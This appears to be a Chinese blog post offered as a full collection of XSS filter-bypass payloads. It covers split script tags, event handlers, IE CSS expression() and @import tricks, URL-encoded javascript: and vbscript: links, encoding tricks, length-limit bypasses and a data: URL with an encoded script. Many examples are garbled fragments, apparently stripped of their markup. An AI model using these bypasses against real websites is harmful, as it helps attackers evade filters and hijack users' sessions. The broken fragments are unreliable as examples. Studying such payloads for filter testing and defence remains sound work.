xss绕过，payload全集

XSS总结:

        xss分为三种，反射型xss，DOM型XSS及存储型XSS，不同类型的XSS的危害不同，有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的，他的课程还有利用xss获取cookie等。

通杀标签payload：

1、script标签

绕过进行一次移除操作：

ipt>alert("XSS")ipt>

Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本：

1.2 JavaScript 事件

我们可以像如下这样在元素中定义   JavaScript  事件：

这个 JavaScript 代码当有人点击它后就会被执行，同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了，但是依旧还有少量事件没有被过滤，例如，onmouseenter 事件：当用户鼠标移动到 div 上时就会触发我们的代码。

另一个绕过的办法就是在属性和= 之间插入一个空格：

1.3 行内样式(Inlinestyle)

我们同样可以在行内样式里利用   IE 浏览器支持的动态特性：//IE5之后才支持

//experssion后执行的语句相当于javascript后执行的语句

过滤器会检查关键字 style，随后跟随的不能是 <，在随后是 expression：

/style=[^<]*((expression\s*?[<]∗?)|(behavior\s*:))[^<]*(?=\>)/Uis

所以，让我们需要把 < 放到其他地方：

1.4 CSS import

IE 浏览器支持在 CSS 中扩展 JavaScript，这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的，因为攻击者现在可以在原始页面中执行 JavaScript 代码了。

malicious.css：

body {

    color: expression(alert('XSS'));

}

为了绕过对 @import 的过滤，可以在 CSS 中使用反斜杠进行绕过：

IE 浏览器会接受反斜杠，但是我们绕过了过滤器。

1.5 Javascript URL

链接标签里可以通过在 URL 中使用 javascript:… 来执行 JavaScript：

link

上面的过滤会从代码中移除 javascript:，所以我们不能直接这么写代码。但我们可以尝试改变 javascript:的写法，使它依旧可以被浏览器执行但又不匹配正则表达式。首先来尝试下 URL 编码：

link

上面这段代码不匹配正则表达式，但是浏览器依旧会执行它，因为浏览器会首先进行 URL 解码操作。

另外，我们还可以使用 VBScript， 虽然它在 IE11 中被禁用了，但依旧可以运行在旧版本的 IE 或者启用兼容模式的 IE11 上。我们可以使用类似上面 JavaScript 的方式来插入 VBScript 代码：

link

'-confirm`1`-'

'-confirm(1)-'

1.6 利用字符编码

%c1;alert(/xss/);//

1.7 绕过长度限制

"οnclick=alert(1)//

">

M

M

M

M

M

M

formaction=javascript:alert(21)>M

M

M

29

οnscrοll=alert(26)>

url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E">^_^